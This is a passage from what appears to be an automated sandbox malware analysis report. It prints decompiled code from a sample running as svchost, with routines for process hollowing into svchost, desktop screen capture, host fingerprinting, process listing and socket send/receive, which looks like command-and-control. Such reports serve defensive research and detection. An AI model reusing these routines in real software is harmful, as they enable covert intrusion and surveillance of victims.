                    					E004C2EC1(_a12, _t23);
                    					_push(0);
                    					_push(_t23);
                    					_push(_a12);
                    					_push( *0x4c5420); // executed
                    					L004C3770(); // executed
                    				}
                    				LeaveCriticalSection(0x4c5424);
                    				return 1;
                    			}




                    0x004c36b6
                    0x004c36c6
                    0x004c36c9
                    0x004c36cd
                    0x004c36d9
                    0x004c36e0
                    0x004c36e2
                    0x004c36e7
                    0x004c36e8
                    0x004c36ee
                    0x004c36f5
                    0x004c36fb
                    0x004c3702
                    0x004c3704
                    0x004c3705
                    0x004c3708
                    0x004c370e
                    0x004c370e
                    0x004c3714
                    0x004c371f

                    APIs
                    • EnterCriticalSection.KERNEL32(004C5424,?,?,?,004C3438,00000007,00000007,?,004C35AC,?,00000000), ref: 004C36CD
                    • send.WS2_32(?,00000004,00000000), ref: 004C36EE
                    • send.WS2_32(?,00000007,00000000,?), ref: 004C370E
                    • LeaveCriticalSection.KERNEL32(004C5424,?,?,004C3438,00000007,00000007,?,004C35AC,?,00000000), ref: 004C3714
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSectionsend$EnterLeave
                    • String ID:
                    • API String ID: 1955582610-0
                    • Opcode ID: ef3b4ffefb3fb2f2f5d37afe1c062f4875b298cd3dd9a969fb52f1990065c0be
                    • Instruction ID: a8db1f53444d5a81faa69d9cc166315f144746c397e05b63d4222ee53be70178
                    • Opcode Fuzzy Hash: ef3b4ffefb3fb2f2f5d37afe1c062f4875b298cd3dd9a969fb52f1990065c0be
                    • Instruction Fuzzy Hash: C101D6770042587ADB415F55FC06FDE7F6CEF05715F00801FFA089A1A2D6B0A64187AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 301 4c3621-4c3638 WaitForSingleObject 302 4c363a 301->302 303 4c36a7-4c36ac 301->303 304 4c363b-4c3642 302->304 305 4c3644-4c3668 call 4c300c 304->305 306 4c36a6 304->306 309 4c366a-4c3676 call 4c36af 305->309 310 4c3680-4c3685 call 4c2d80 305->310 306->303 314 4c367b-4c367e 309->314 313 4c368a-4c368b 310->313 315 4c368c-4c36a4 ResetEvent WaitForSingleObject 313->315 314->315 315->304 315->306
                    C-Code - Quality: 85%
                    			E004C3621(char* _a4) {
                    				char _t14;
                    				char* _t28;
                    				char* _t29;
                    				void* _t30;
                    
                    				_t29 = _a4;
                    				if(WaitForSingleObject( *(_t29 + 4), 0xffffffff) == 0) {
                    					while( *0x4c541f == 0) {
                    						_t28 = 0x4c5440 +  *(_t29 + 8) * 0xc;
                    						_t14 = E004C300C( *((intOrPtr*)(_t28 + 4)), _t29 + 0xc, 0xffff, 0xffffffff); // executed
                    						_t30 = _t30 + 0x10;
                    						if(_t14 <= 0) {
                    							E004C2D80( *(_t29 + 8), 1); // executed
                    						} else {
                    							E004C36AF(2,  *(_t29 + 8) & 0x000000ff, _t29 + 0xc, _t14); // executed
                    							_t30 = _t30 + 0x10;
                    						}
                    						ResetEvent( *(_t29 + 4));
                    						 *_t28 = 0;
                    						 *_t29 = 0;
                    						if(WaitForSingleObject( *(_t29 + 4), 0xffffffff) == 0) {
                    							continue;
                    						}
                    						break;
                    					}
                    				}
                    				return 0;
                    			}







                    0x004c362c
                    0x004c3638
                    0x004c363b
                    0x004c3654
                    0x004c365e
                    0x004c3663
                    0x004c3668
                    0x004c3685
                    0x004c366a
                    0x004c3676
                    0x004c367b
                    0x004c367b
                    0x004c368f
                    0x004c3695
                    0x004c369a
                    0x004c36a4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c36a4
                    0x004c36a6
                    0x004c36ac

                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C3634
                      • Part of subcall function 004C300C: recv.WS2_32(?,?,?,00000000), ref: 004C3033
                    • ResetEvent.KERNEL32(?), ref: 004C368F
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C36A0
                      • Part of subcall function 004C36AF: EnterCriticalSection.KERNEL32(004C5424,?,?,?,004C3438,00000007,00000007,?,004C35AC,?,00000000), ref: 004C36CD
                      • Part of subcall function 004C36AF: send.WS2_32(?,00000004,00000000), ref: 004C36EE
                      • Part of subcall function 004C36AF: send.WS2_32(?,00000007,00000000,?), ref: 004C370E
                      • Part of subcall function 004C36AF: LeaveCriticalSection.KERNEL32(004C5424,?,?,004C3438,00000007,00000007,?,004C35AC,?,00000000), ref: 004C3714
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalObjectSectionSingleWaitsend$EnterEventLeaveResetrecv
                    • String ID:
                    • API String ID: 1784597384-0
                    • Opcode ID: d40594cad66dd542cde92f702c42b7ad0e3fd4a02f407b000be8567e00ddb2fc
                    • Instruction ID: bd9c8241a6598b73560860d8a08c50165e0eaed992917ffe989d254d91f2527c
                    • Opcode Fuzzy Hash: d40594cad66dd542cde92f702c42b7ad0e3fd4a02f407b000be8567e00ddb2fc
                    • Instruction Fuzzy Hash: 35110876104601BFE7706A55CD02F23BB9C9F01331F10863EF169862E1E725F950876C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 340 4c343f-4c3449 341 4c347a-4c347b 340->341 342 4c344b-4c3474 call 4c2e19 CreateThread FindCloseChangeNotification 340->342 342->341
                    C-Code - Quality: 100%
                    			E004C343F(void* _a4, intOrPtr _a8) {
                    				void* _t3;
                    				void* _t6;
                    				int _t7;
                    
                    				if( *0x4c5420 == 0) {
                    					 *0x4c5408 = E004C2E19(_a8, 0x4c6040);
                    					_t6 = CreateThread(0, 0, E004C3051, _a4, 0, 0); // executed
                    					_t7 = FindCloseChangeNotification(_t6); // executed
                    					return _t7;
                    				}
                    				return _t3;
                    			}






                    0x004c3449
                    0x004c345a
                    0x004c346d
                    0x004c3474
                    0x00000000
                    0x004c3474
                    0x004c347b

                    APIs
                      • Part of subcall function 004C2E19: lstrlenA.KERNEL32(?,?,?,004C1187,?,?), ref: 004C2E21
                    • CreateThread.KERNELBASE(00000000,00000000,Function_00003051,00000000,00000000,00000000), ref: 004C346D
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,004C1468,00000000,00000000), ref: 004C3474
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseCreateFindNotificationThreadlstrlen
                    • String ID:
                    • API String ID: 3140354245-0
                    • Opcode ID: c2528feaa0946bf108ed25aba5384a3aa3b95833320aa3704adc2210d8a3f478
                    • Instruction ID: b5e4b7cad99ce984089f5ea974d33633b5899cfd3ffcd948d9471485cef5df75
                    • Opcode Fuzzy Hash: c2528feaa0946bf108ed25aba5384a3aa3b95833320aa3704adc2210d8a3f478
                    • Instruction Fuzzy Hash: BAE0E675444604BEDF945FA1BD05F7A379CE744316B10802EF909E2162D7799590866C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • gethostbyname.WS2_32(?), ref: 004C1009
                    • inet_ntoa.WS2_32(?), ref: 004C101E
                    • lstrcpyA.KERNEL32(?,00000000), ref: 004C102F
                    • socket.WS2_32(00000002,00000001,00000000), ref: 004C103D
                    • htons.WS2_32(?), ref: 004C105B
                    • inet_addr.WS2_32(?), ref: 004C1069
                    • connect.WS2_32(00000000,?,00000010), ref: 004C1079
                    • closesocket.WS2_32(00000000), ref: 004C1085
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocketconnectgethostbynamehtonsinet_addrinet_ntoalstrcpysocket
                    • String ID:
                    • API String ID: 3261360984-0
                    • Opcode ID: 56c7a55cd457d9fc8beade2ef6010bc9898fcd137b4ad5cd531654a428421f72
                    • Instruction ID: 440884c3b630cd7bad83461dba1de3be1d1d78e7242365a6552aef50fe78b7bb
                    • Opcode Fuzzy Hash: 56c7a55cd457d9fc8beade2ef6010bc9898fcd137b4ad5cd531654a428421f72
                    • Instruction Fuzzy Hash: 96513F6685E3C04FDB1387744D6AA90BFB5AE13254B0F86DBC4C1CF4A3E24C498AD366
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • closesocket.WS2_32(?), ref: 004C2DAA
                      • Part of subcall function 004C36AF: EnterCriticalSection.KERNEL32(004C5424,?,?,?,004C3438,00000007,00000007,?,004C35AC,?,00000000), ref: 004C36CD
                      • Part of subcall function 004C36AF: send.WS2_32(?,00000004,00000000), ref: 004C36EE
                      • Part of subcall function 004C36AF: send.WS2_32(?,00000007,00000000,?), ref: 004C370E
                      • Part of subcall function 004C36AF: LeaveCriticalSection.KERNEL32(004C5424,?,?,004C3438,00000007,00000007,?,004C35AC,?,00000000), ref: 004C3714
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSectionsend$EnterLeaveclosesocket
                    • String ID:
                    • API String ID: 4004483170-0
                    • Opcode ID: 06d297930a469fe21bc8b52230785b7c02b9f82f9b07a321f401f0933e87a257
                    • Instruction ID: 77bc8ae96a4731ce5b6d3a553f45a9b89af538e7f712df17fc3534dc8309bf74
                    • Opcode Fuzzy Hash: 06d297930a469fe21bc8b52230785b7c02b9f82f9b07a321f401f0933e87a257
                    • Instruction Fuzzy Hash: 75E0CD7B6405083AF7911969DC02F49FB0997A0715F16C03AF60C5E1E1D2B57660455A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004C1D41(long _a4) {
                    				void* _t2;
                    
                    				_t2 = LocalAlloc(0x40, _a4); // executed
                    				return _t2;
                    			}




                    0x004c1d49
                    0x004c1d50

                    APIs
                    • LocalAlloc.KERNELBASE(00000040,?,?,004C3070,00080060), ref: 004C1D49
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocLocal
                    • String ID:
                    • API String ID: 3494564517-0
                    • Opcode ID: 9c84cfef6d424396959a3923d3523b39ef0179e61815e4d5b80cffbb195a49fe
                    • Instruction ID: c01aee9662ce1b7b87c117d37f199d7ab8ed62ec59f10c563da08cbcb77a53ec
                    • Opcode Fuzzy Hash: 9c84cfef6d424396959a3923d3523b39ef0179e61815e4d5b80cffbb195a49fe
                    • Instruction Fuzzy Hash: 79B0123108420CF7CA401BD2EC06E847F1CD744650F004010F70C040518672501046A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 100%
                    			E004C2BAB() {
                    				struct HWND__* _v8;
                    				int _v12;
                    				int _v16;
                    				void* _v20;
                    				void* _v24;
                    				struct tagRECT _v40;
                    				struct HWINSTA__* _t17;
                    				struct HDESK__* _t20;
                    				struct HWND__* _t24;
                    				struct HDC__* _t25;
                    				int _t34;
                    				void* _t35;
                    				struct HDC__* _t39;
                    				int _t42;
                    				void* _t43;
                    				struct HDC__* _t46;
                    
                    				_t43 = 0;
                    				_t17 = OpenWindowStationA("WinSta0", 0, 0x37f);
                    				GetProcessWindowStation();
                    				SetProcessWindowStation(_t17);
                    				_t20 = OpenInputDesktop(0, 0, 0x2000000);
                    				GetThreadDesktop(GetCurrentThreadId());
                    				SetThreadDesktop(_t20);
                    				_t24 = GetDesktopWindow();
                    				_v8 = _t24;
                    				_t25 = GetWindowDC(_t24);
                    				_t39 = _t25;
                    				if(_t39 == 0) {
                    					return _t25;
                    				}
                    				_t46 = CreateCompatibleDC(_t39);
                    				if(_t46 == 0) {
                    					L7:
                    					ReleaseDC(_v8, _t39);
                    					return _t43;
                    				}
                    				if(GetWindowRect(_v8,  &_v40) != 0) {
                    					_t34 = _v40.right - _v40.left + 1;
                    					_t42 = _v40.bottom - _v40.top + 1;
                    					_v16 = _t34;
                    					_v12 = _t42;
                    					_t35 = CreateCompatibleBitmap(_t39, _t34, _t42);
                    					_v24 = _t35;
                    					if(_t35 != 0) {
                    						_v20 = SelectObject(_t46, _t35);
                    						if(BitBlt(_t46, 0, 0, _v16, _v12, _t39, 0, 0, 0xcc0020) != 0) {
                    							SelectObject(_t46, _v20);
                    							_t43 = _v24;
                    						}
                    					}
                    				}
                    				DeleteDC(_t46);
                    				goto L7;
                    			}



















                    0x004c2bb9
                    0x004c2bc1
                    0x004c2bc9
                    0x004c2bd0
                    0x004c2bdd
                    0x004c2bec
                    0x004c2bf3
                    0x004c2bf9
                    0x004c2c00
                    0x004c2c03
                    0x004c2c09
                    0x004c2c0d
                    0x004c2c9f
                    0x004c2c9f
                    0x004c2c1a
                    0x004c2c1e
                    0x004c2c8f
                    0x004c2c93
                    0x00000000
                    0x004c2c99
                    0x004c2c2f
                    0x004c2c3d
                    0x004c2c3e
                    0x004c2c42
                    0x004c2c45
                    0x004c2c48
                    0x004c2c4e
                    0x004c2c53
                    0x004c2c68
                    0x004c2c79
                    0x004c2c7f
                    0x004c2c85
                    0x004c2c85
                    0x004c2c79
                    0x004c2c53
                    0x004c2c89
                    0x00000000

                    APIs
                    • OpenWindowStationA.USER32(WinSta0,00000000,0000037F), ref: 004C2BC1
                    • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?,-000000CA), ref: 004C2BC9
                    • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2BD0
                    • OpenInputDesktop.USER32(00000000,00000000,02000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2), ref: 004C2BDD
                    • GetCurrentThreadId.KERNEL32 ref: 004C2BE5
                    • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2BEC
                    • SetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2BF3
                    • GetDesktopWindow.USER32 ref: 004C2BF9
                    • GetWindowDC.USER32(00000000,?,?,?,?,?,?,?,004C2CB3,-000000CA,?,?,?,004C17B2,00000000,?), ref: 004C2C03
                    • CreateCompatibleDC.GDI32(00000000), ref: 004C2C14
                    • GetWindowRect.USER32 ref: 004C2C27
                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004C2C48
                    • SelectObject.GDI32(00000000,00000000), ref: 004C2C57
                    • BitBlt.GDI32(00000000,00000000,00000000,?,004C2CB3,00000000,00000000,00000000,00CC0020), ref: 004C2C71
                    • SelectObject.GDI32(00000000,?), ref: 004C2C7F
                    • DeleteDC.GDI32(00000000), ref: 004C2C89
                    • ReleaseDC.USER32 ref: 004C2C93
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Desktop$StationThread$CompatibleCreateObjectOpenProcessSelect$BitmapCurrentDeleteInputRectRelease
                    • String ID: WinSta0
                    • API String ID: 861526744-2727908723
                    • Opcode ID: d9ecb9b73e4e289ca250ff70c118a8f950400288ff8562475c52e3990e5f5a9a
                    • Instruction ID: 96d5d80f1720ce070acc5fc2fd9c64c0f04bb212e05c4c9f49c1bd93f75b4102
                    • Opcode Fuzzy Hash: d9ecb9b73e4e289ca250ff70c118a8f950400288ff8562475c52e3990e5f5a9a
                    • Instruction Fuzzy Hash: 10211C75940215AFDB519FE6DE5CEAF7B7CEB89741B004139FA02E2210DB748A01DB78
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 55%
                    			E004C1849(intOrPtr _a4) {
                    				void* _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				intOrPtr _v20;
                    				struct _PROCESS_INFORMATION _v36;
                    				struct _STARTUPINFOA _v104;
                    				char _v136;
                    				char _v396;
                    				intOrPtr _v936;
                    				char _v1112;
                    				intOrPtr _t52;
                    				intOrPtr _t53;
                    				char* _t57;
                    				void* _t67;
                    				CHAR* _t68;
                    				void* _t75;
                    				long _t76;
                    				CHAR* _t78;
                    				void* _t81;
                    				void* _t82;
                    				void* _t83;
                    
                    				GetSystemDirectoryA( &_v396, 0x104);
                    				PathAppendA( &_v396, E004C3720("svchost.exe -k netsvcs",  &_v136));
                    				_t76 = 0x44;
                    				_t68 = 0;
                    				E004C1D75( &_v104, 0, _t76);
                    				asm("stosd");
                    				asm("stosd");
                    				_t82 = _t81 + 0xc;
                    				asm("stosd");
                    				asm("stosd");
                    				_v104.cb = _t76;
                    				if(CreateProcessA(0,  &_v396, 0, 0, 0, 4, 0, 0,  &_v104,  &_v36) != 0) {
                    					_t75 = E004C1AE5();
                    					_t52 =  *((intOrPtr*)(_t75 + 0x3c)) + _t75;
                    					_v20 = _t52;
                    					_t77 =  *((intOrPtr*)(_t52 + 0x50));
                    					_v16 =  *((intOrPtr*)(_t52 + 0x50));
                    					_t53 = E004C1D41(_t77);
                    					_v12 = _t53;
                    					if(_t53 == 0) {
                    						goto L1;
                    					}
                    					E004C1D51(_t53, _t75, _t77);
                    					_t83 = _t82 + 0xc;
                    					_t57 =  &_v8;
                    					_v8 = 0;
                    					_t78 = 0;
                    					__imp__ZwAllocateVirtualMemory(_v36.hProcess, _t57, 0,  &_v16, 0x3000, 0x40);
                    					if(_t57 == 0) {
                    						_t67 = E004C19B6( *((intOrPtr*)(_v20 + 0xa0)) + _t75, _v12, _v8 - _t75,  *((intOrPtr*)(_v20 + 0xa4)));
                    						_t83 = _t83 + 0x10;
                    						__imp__ZwWriteVirtualMemory(_v36.hProcess, _v8, _v12, _v16, 0);
                    						if(_t67 == 0) {
                    							_t78 = _v8 - _t75 + _a4;
                    						}
                    					}
                    					E004C1D2D(_v12);
                    					if(_t78 != 0) {
                    						E004C1D75( &_v1112, _t68, 0x2cc);
                    						_v1112 = 0x10002;
                    						_v936 = _t78;
                    						__imp__ZwSetContextThread(_v36.hThread,  &_v1112);
                    						__imp__ZwResumeThread(_v36.hThread, _t68);
                    						_t68 = 1;
                    					}
                    					return _t68;
                    				}
                    				L1:
                    				return 0;
                    			}
























                    0x004c1861
                    0x004c1882
                    0x004c188a
                    0x004c188c
                    0x004c1893
                    0x004c189d
                    0x004c189e
                    0x004c189f
                    0x004c18a2
                    0x004c18a3
                    0x004c18bb
                    0x004c18c6
                    0x004c18d4
                    0x004c18d9
                    0x004c18db
                    0x004c18de
                    0x004c18e2
                    0x004c18e5
                    0x004c18eb
                    0x004c18f0
                    0x00000000
                    0x00000000
                    0x004c18f5
                    0x004c18fa
                    0x004c1909
                    0x004c1910
                    0x004c1913
                    0x004c1915
                    0x004c191d
                    0x004c193a
                    0x004c193f
                    0x004c194f
                    0x004c1957
                    0x004c195e
                    0x004c195e
                    0x004c1957
                    0x004c1964
                    0x004c196c
                    0x004c197b
                    0x004c198d
                    0x004c1997
                    0x004c199d
                    0x004c19a7
                    0x004c19ad
                    0x004c19ad
                    0x00000000
                    0x004c19af
                    0x004c18c8
                    0x00000000

                    APIs
                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004C1861
                      • Part of subcall function 004C3720: lstrcpyA.KERNEL32(?,?,?,004C212C,C:\,?,?,00000200,?,00000000,?,?,00000040), ref: 004C3729
                    • PathAppendA.SHLWAPI(?,00000000), ref: 004C1882
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 004C18BE
                    • ZwAllocateVirtualMemory.NTDLL(?,?,00000000,?,00003000,00000040), ref: 004C1915
                    • ZwWriteVirtualMemory.NTDLL(?,?,?,?,00000000), ref: 004C194F
                    • ZwSetContextThread.NTDLL(?,?), ref: 004C199D
                    • ZwResumeThread.NTDLL(?,00000000), ref: 004C19A7
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: MemoryThreadVirtual$AllocateAppendContextCreateDirectoryPathProcessResumeSystemWritelstrcpy
                    • String ID: svchost.exe -k netsvcs
                    • API String ID: 1271921029-1823686963
                    • Opcode ID: 589210ef210d8eab3fd93dae498b83e030f3e8f974da2b4e9a9a0d030d692627
                    • Instruction ID: 1a7e4da51a485a41a49e8a55cb69ab3bae8c20bc5e098e697a48d8ca57c16458
                    • Opcode Fuzzy Hash: 589210ef210d8eab3fd93dae498b83e030f3e8f974da2b4e9a9a0d030d692627
                    • Instruction Fuzzy Hash: 42415CB6900218BFDB519BA5DD49FEEBBBCEB45304F0400AAF604E6162D6359E448B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E004C20E8(long __edx) {
                    				long _v8;
                    				long _v12;
                    				char _v13;
                    				long _v16;
                    				intOrPtr _v20;
                    				long _v24;
                    				char _v56;
                    				char _v120;
                    				char _v632;
                    				int _t48;
                    				signed int _t64;
                    				signed int _t65;
                    				char _t66;
                    				intOrPtr _t67;
                    				long _t71;
                    				long _t72;
                    				signed char* _t73;
                    				long _t81;
                    				unsigned int _t83;
                    				char _t84;
                    				long _t85;
                    				void* _t86;
                    				intOrPtr _t89;
                    				int _t90;
                    				void* _t91;
                    				void* _t92;
                    				long _t93;
                    				long _t94;
                    				void* _t95;
                    
                    				_t85 = __edx;
                    				_t72 = 0;
                    				_v632 = 0;
                    				_v12 = 0;
                    				GetVolumeInformationA(E004C3720("C:\\",  &_v56),  &_v632, 0x200,  &_v12,  &_v16,  &_v24,  &_v120, 0x40);
                    				_t48 = lstrlenA( &_v632);
                    				_push(_v12);
                    				_t90 = _t48;
                    				_t91 = _t90 + wsprintfA( &(( &_v632)[_t90]), E004C3720("%x",  &_v56));
                    				_v8 = 0x200 - _t91;
                    				GetUserNameA( &(( &_v632)[_t91]),  &_v8);
                    				_t92 = _t91 + _v8 - 1;
                    				_v8 = 0x200 - _t92;
                    				GetComputerNameA( &(( &_v632)[_t92]),  &_v8);
                    				_t93 = _t92 + _v8;
                    				asm("xorps xmm0, xmm0");
                    				_t81 = 1;
                    				asm("movlpd [ebp-0x10], xmm0");
                    				_t89 = _v20;
                    				_v24 = _t93;
                    				_t94 = _v16;
                    				_v12 = 1;
                    				_v8 = 0;
                    				if(_t93 > 0) {
                    					do {
                    						asm("cdq");
                    						asm("adc edx, 0xffffffff");
                    						_t89 = _t89 + E004C37B0( *((char*)(_t95 + _t72 - 0x274)) + 0xffffffe0, _t85, _t81, _v8);
                    						asm("adc esi, edx");
                    						_t71 = E004C37B0(_v12, _v8, 0xe3, 0);
                    						_t72 = _t72 + 1;
                    						_t81 = _t71;
                    						_v12 = _t71;
                    						_v8 = _t85;
                    					} while (_t72 < _v24);
                    					_v16 = _t94;
                    					_v20 = _t89;
                    				}
                    				_t73 =  &_v13;
                    				_t86 = 0;
                    				do {
                    					_t64 =  *_t73 & 0x000000ff;
                    					_t83 = _t64 >> 4;
                    					if(_t83 >= 0xa) {
                    						_t84 = _t83 + 0x57;
                    					} else {
                    						_t84 = _t83 + 0x30;
                    					}
                    					_t65 = _t64 & 0x0000000f;
                    					 *((char*)(_t86 + "730c0a4976f1cf34")) = _t84;
                    					if(_t65 >= 0xa) {
                    						_t66 = _t65 + 0x57;
                    					} else {
                    						_t66 = _t65 + 0x30;
                    					}
                    					 *((char*)(_t86 + "30c0a4976f1cf34")) = _t66;
                    					_t86 = _t86 + 2;
                    					_t67 = 0x10;
                    					_t73 = _t73 - 1;
                    				} while (_t86 < _t67);
                    				 *0x4c5278 = _t89;
                    				 *0x4c527c = _t94;
                    				 *0x4c5150 = _t67;
                    				 *0x4c5148 = 0;
                    				return _t67;
                    			}
































                    0x004c20e8
                    0x004c2117
                    0x004c211e
                    0x004c2124
                    0x004c212f
                    0x004c213c
                    0x004c2142
                    0x004c2145
                    0x004c2167
                    0x004c216d
                    0x004c2180
                    0x004c218a
                    0x004c219b
                    0x004c219e
                    0x004c21a4
                    0x004c21a9
                    0x004c21ac
                    0x004c21ad
                    0x004c21b2
                    0x004c21b5
                    0x004c21ba
                    0x004c21bd
                    0x004c21c0
                    0x004c21c3
                    0x004c21c5
                    0x004c21d0
                    0x004c21d5
                    0x004c21df
                    0x004c21eb
                    0x004c21f0
                    0x004c21f5
                    0x004c21f6
                    0x004c21f8
                    0x004c21fb
                    0x004c21fe
                    0x004c2203
                    0x004c2206
                    0x004c2206
                    0x004c2209
                    0x004c220c
                    0x004c220e
                    0x004c220e
                    0x004c2213
                    0x004c2219
                    0x004c2220
                    0x004c221b
                    0x004c221b
                    0x004c221b
                    0x004c2223
                    0x004c2226
                    0x004c222f
                    0x004c2235
                    0x004c2231
                    0x004c2231
                    0x004c2231
                    0x004c2237
                    0x004c223f
                    0x004c2242
                    0x004c2243
                    0x004c2244
                    0x004c2248
                    0x004c224f
                    0x004c2256
                    0x004c225b
                    0x004c2264

                    APIs
                      • Part of subcall function 004C3720: lstrcpyA.KERNEL32(?,?,?,004C212C,C:\,?,?,00000200,?,00000000,?,?,00000040), ref: 004C3729
                    • GetVolumeInformationA.KERNEL32(00000000,?,00000200,?,00000000,?,?,00000040), ref: 004C212F
                    • lstrlenA.KERNEL32(?), ref: 004C213C
                    • wsprintfA.USER32 ref: 004C2161
                    • GetUserNameA.ADVAPI32(?,?), ref: 004C2180
                    • GetComputerNameA.KERNEL32 ref: 004C219E
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: Name$ComputerInformationUserVolumelstrcpylstrlenwsprintf
                    • String ID: C:\
                    • API String ID: 1784582681-3404278061
                    • Opcode ID: 1dfbd9b62f64ec4a5bcc7677149f5548bc70ed69f4d78846dcc24dd4476ec2ef
                    • Instruction ID: b57e26fee0096ed259b3ff54b150461d9583207603c493cf2ff9070c1e0ae736
                    • Opcode Fuzzy Hash: 1dfbd9b62f64ec4a5bcc7677149f5548bc70ed69f4d78846dcc24dd4476ec2ef
                    • Instruction Fuzzy Hash: 9941B0B6D00118AFCF50DFA4DD89FEEBBB8EB44314F2442ABE505E3241D6745B448B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004C1B15(intOrPtr* _a4) {
                    				intOrPtr _v8;
                    				char _v268;
                    				void* _v304;
                    				void* _t26;
                    				intOrPtr _t27;
                    				void* _t29;
                    				int _t30;
                    				intOrPtr _t31;
                    				void* _t32;
                    
                    				_t30 = 0;
                    				_t29 = CreateToolhelp32Snapshot(2, 0);
                    				_v304 = 0x128;
                    				Process32First(_t29,  &_v304);
                    				_t26 = LocalAlloc(0x40, 0x2000);
                    				while(1) {
                    					_t27 = lstrlenA( &_v268) + _t30;
                    					_v8 = _t27;
                    					if(_t27 + 3 > 0x2000) {
                    						break;
                    					}
                    					E004C1D51(_t26 + _t30,  &_v268, _t17);
                    					_t31 = _v8;
                    					_t32 = _t32 + 0xc;
                    					 *((char*)(_t26 + _t31)) = 0xa;
                    					_t30 = _t31 + 1;
                    					if(Process32Next(_t29,  &_v304) != 0) {
                    						continue;
                    					}
                    					break;
                    				}
                    				CloseHandle(_t29);
                    				 *_a4 = _t30;
                    				return _t26;
                    			}












                    0x004c1b21
                    0x004c1b2b
                    0x004c1b35
                    0x004c1b3f
                    0x004c1b51
                    0x004c1b53
                    0x004c1b60
                    0x004c1b63
                    0x004c1b6f
                    0x00000000
                    0x00000000
                    0x004c1b7d
                    0x004c1b82
                    0x004c1b85
                    0x004c1b8f
                    0x004c1b94
                    0x004c1b9c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c1b9c
                    0x004c1b9f
                    0x004c1ba9
                    0x004c1bb0

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 004C1B26
                    • Process32First.KERNEL32 ref: 004C1B3F
                    • LocalAlloc.KERNEL32(00000040,00002000,00000000,?,00000002,00000000,00000000,-000000CA,00000000), ref: 004C1B4B
                    • lstrlenA.KERNEL32(?), ref: 004C1B5A
                    • Process32Next.KERNEL32 ref: 004C1B95
                    • CloseHandle.KERNEL32(00000000), ref: 004C1B9F
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
